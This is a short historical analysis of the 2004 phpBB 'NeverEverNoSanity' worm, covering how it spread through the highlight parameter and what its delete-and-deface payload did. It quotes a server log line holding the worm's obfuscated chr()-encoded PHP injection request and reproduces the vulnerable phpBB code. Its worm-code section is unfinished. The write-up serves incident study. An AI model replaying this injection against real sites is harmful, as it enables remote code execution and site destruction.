by Javantea aka. Joel R. Voss
Analysis: Dec 20, 2004
Write-up: Sept 8, 2006
Botnets
phpBB Official Homepage
The first Linux/Apache worm was quite recent (Dec 20, 2004), targetting a vulnerability in phpBB which was caused by PHP. The worm used Perl, Google, and left an obvious trace. Although it did not become a botnet, it easily could have. It was a worm and had a payload that deleted many files and replaced them with a banner. This is known as a delete files + hello world payload.
On Dec 20, 2004, Shannon Lee (shannon webhostworks net) reported to Bugtraq that a phpBB worm had been spreading [1]. She reported that the worm defaced pages with NeverEverNoSanity WebWorm Generation 9. The number is actually a counter of the generations of the worm (Generation 1 would be the initial attacker, generation 2 would be the initial attacker's targets, and so on). The worm used the highlight bug in phpBB, which allows execution of arbitrary PHP code [2].
The virus sends itself in a series of requests each adding around 19 bytes to the size of the file.
64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
/viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),ch
r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)
%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252
echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252ech
r(32)),exit%252e%2527 HTTP/1.0" 200 13648
"http://forum.CLIENT SITEOMITTED.com/viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efw
rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(11
1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(11
5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%25
2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252ec
hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
phpBB Vulnerable Code:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(urldecode(htmlspecialchars($HTTP_GET_VARS['highlight']))));
for($i = 0; $i < sizeof($words); $i++)
{
if (trim($words[$i]) != '')
{
$highlight_match .= (($highlight_match != '') ? '|' : '') . str_replace('*', '\w*', phpbb_preg_quote($words[$i], '#'));
}
}
unset($words);
$highlight = urlencode($HTTP_GET_VARS['highlight']);
}
//
// This does exactly what preg_quote() does in PHP 4-ish
// If you just need the 1-parameter preg_quote call, then don't bother using this.
//
function phpbb_preg_quote($str, $delimiter)
{
$text = preg_quote($str);
$text = str_replace($delimiter, '\\' . $delimiter, $text);
return $text;
}
Virus Code:
Unfinished.
Unfinished.
1) Lee, Shannon. "phpbb worm." URL: http://www.securityfocus.com/archive/1/385063 Dec 20, 2004 2) psoTFX. "howdark.com exploits - follow up." URL: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 Nov 18, 2004 3) Hoffman, Billy. "Analysis of Web Application Worms and Viruses." URL: http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Hoffman/BH-Fed-06-Hoffman-up.pdf#search=%22phpbb%20worm%20analysis%22